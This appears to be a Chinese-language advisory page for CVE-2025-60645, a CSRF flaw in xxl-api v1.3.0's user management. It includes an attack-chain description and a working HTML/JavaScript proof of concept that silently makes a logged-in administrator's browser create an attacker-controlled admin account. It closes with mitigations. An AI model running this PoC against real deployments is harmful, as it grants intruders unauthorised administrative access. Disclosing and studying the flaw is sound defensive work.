CVE-2025-60645 CVSS 6.5 中危

CVE-2025-60645 | xxl-api v1.3.0 CSRF漏洞导致任意用户添加

披露日期: 2025-11-12

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-60645

漏洞类型

CSRF (跨站请求伪造)

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

xxl-api

漏洞概述

CVE-2025-60645是xxl-api v1.3.0版本中的一个跨站请求伪造（CSRF）漏洞。该漏洞存在于用户管理模块，由于应用程序未能对用户添加请求实施有效的CSRF令牌验证，攻击者可以通过构造恶意的GET请求，诱导已登录的管理员访问，从而在不知情的情况下向系统添加任意新用户。攻击成功后，攻击者可以使用新添加的账户登录系统管理后台，获取系统的进一步访问权限，可能导致敏感数据泄露、配置篡改等严重后果。由于该漏洞利用需要用户交互（UI:R），攻击者通常通过钓鱼邮件、恶意链接等方式诱导目标用户触发恶意请求。

技术细节

xxl-api v1.3.0的用户管理模块存在CSRF漏洞。漏洞根源在于添加用户的接口（/xxl-api-admin/user/add或类似端点）缺少CSRF token验证机制。攻击者构造一个包含用户信息的恶意GET请求链接，例如：xxx.com/xxl-api-admin/user/add?username=attacker&password=xxx&role=admin。当已登录的管理员访问该恶意链接时，浏览器会自动携带当前会话的Cookie信息向服务器发送请求，服务器误认为这是管理员的合法操作，从而执行添加用户的行为。攻击者利用了Web应用程序对用户请求的信任机制，通过社会工程学手段诱导管理员触发恶意请求，实现未授权的用户创建操作。

攻击链分析

STEP 1

步骤1

攻击者识别目标xxl-api v1.3.0的部署环境，找到用户管理模块的添加用户接口

STEP 2

步骤2

攻击者构造包含恶意用户信息的GET请求URL，参数包括用户名、密码和管理员角色

STEP 3

步骤3

攻击者通过钓鱼邮件、恶意网站或社交工程手段诱导已登录的管理员访问构造的恶意链接

STEP 4

步骤4

管理员浏览器自动携带当前会话Cookie向目标服务器发送请求

STEP 5

步骤5

服务器验证会话Cookie有效后，执行添加用户的操作，创建攻击者控制的账户

STEP 6

步骤6

攻击者使用新添加的账户登录系统管理后台，执行进一步的攻击操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CSRF PoC for CVE-2025-60645 - Add arbitrary user -->
<!DOCTYPE html>
<html>
<head>
    <title>CSRF Exploit - CVE-2025-60645</title>
</head>
<body>
    <h1>CSRF Exploit - Add Admin User</h1>
    <p>This page will attempt to add a new admin user to xxl-api.</p>
    
    <script>
        // Target endpoint - modify based on actual deployment
        var targetUrl = 'http://target:8080/xxl-api-admin/user/add';
        
        // Malicious user credentials
        var payload = {
            username: 'attacker_hacker',
            password: 'P@ssw0rd123!',
            role: 'admin',
            status: 1
        };
        
        // Construct GET request with query parameters
        var queryString = Object.keys(payload).map(function(key) {
            return key + '=' + encodeURIComponent(payload[key]);
        }).join('&');
        
        var fullUrl = targetUrl + '?' + queryString;
        
        // Automatically send the request
        window.location.href = fullUrl;
    </script>
    
    <noscript>
        <p>If JavaScript is disabled, <a id="exploit" href="TARGET_URL">click here</a> to trigger exploit.</p>
    </noscript>
</body>
</html>

影响范围

xxl-api v1.3.0

防御指南

临时缓解措施

在修复补丁发布前，可通过以下措施临时缓解风险：1) 临时禁用用户管理模块的添加用户功能；2) 加强管理员账户的安全管理，使用强密码策略；3) 对管理后台访问实施IP白名单限制；4) 提高管理员安全意识，警惕不明链接；5) 启用详细的操作审计日志，监控异常用户创建行为。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表